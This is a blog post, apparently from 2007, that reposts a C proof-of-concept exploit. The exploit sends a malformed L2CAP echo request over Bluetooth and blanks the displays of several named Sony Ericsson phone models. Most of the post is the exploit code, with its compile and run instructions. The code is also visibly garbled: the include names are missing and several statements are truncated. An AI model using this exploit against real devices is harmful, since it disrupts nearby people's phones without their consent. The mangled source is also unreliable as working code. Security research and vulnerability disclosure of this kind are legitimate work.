bluetooth6.c

Proof of concept exploit that resets Sony/Ericsson phones via a flaw in Bluetooth.

/* Sony/Ericsson reset display – PoC */
/* Pierre BETOUIN – pierre.betouin@infratech.fr */
/* 05-02-2006 */
/* Vulnerability found using BSS fuzzer : */
/* Download http://www.secuobs.com/news/05022006-bluetooth10.shml */
/* */
/* Causes anormal behaviours on some Sony/Ericsson */
/* cell phones */
/* Vulnerable tested devices : */
/* – K600i */
/* – V600i */
/* – K750i */
/* – W800i */
/* – And maybe other ones… */
/* */
/* Vulnerable devices will slowly turn their screen into */
/* black and then display a white screen. */
/* After a short period (~45sec), they will go back to */
/* their normal behaviour */
/* */
/* gcc -lbluetooth reset_display_sonyericsson.c */
/* -o reset_display_sonyericsson */
/* ./reset_display_sonyericsson 00:12:EE:XX:XX:XX */

#include
#include
#include
#include
#include
#include
#include
#include

#define SIZE 4
#define FAKE_SIZE 1 // SIZE – 3 (3 bytes L2CAP header)

int main(int argc, char **argv)
{
char *buffer;
l2cap_cmd_hdr *cmd;
struct sockaddr_l2 addr;
int sock, sent, i;

if(argc \n”, argv[0]);
exit(EXIT_FAILURE);
}

if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) code = L2CAP_ECHO_REQ;
cmd->ident = 1;
cmd->len = FAKE_SIZE;

if( (sent=send(sock, buffer, SIZE, 0)) >= 0)
{
printf(“L2CAP packet sent (%d)\n”, sent);
}

printf(“Buffer:\t”);
for(i=0; i

Advertisements

~ by Balle on July 6, 2007.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
%d bloggers like this: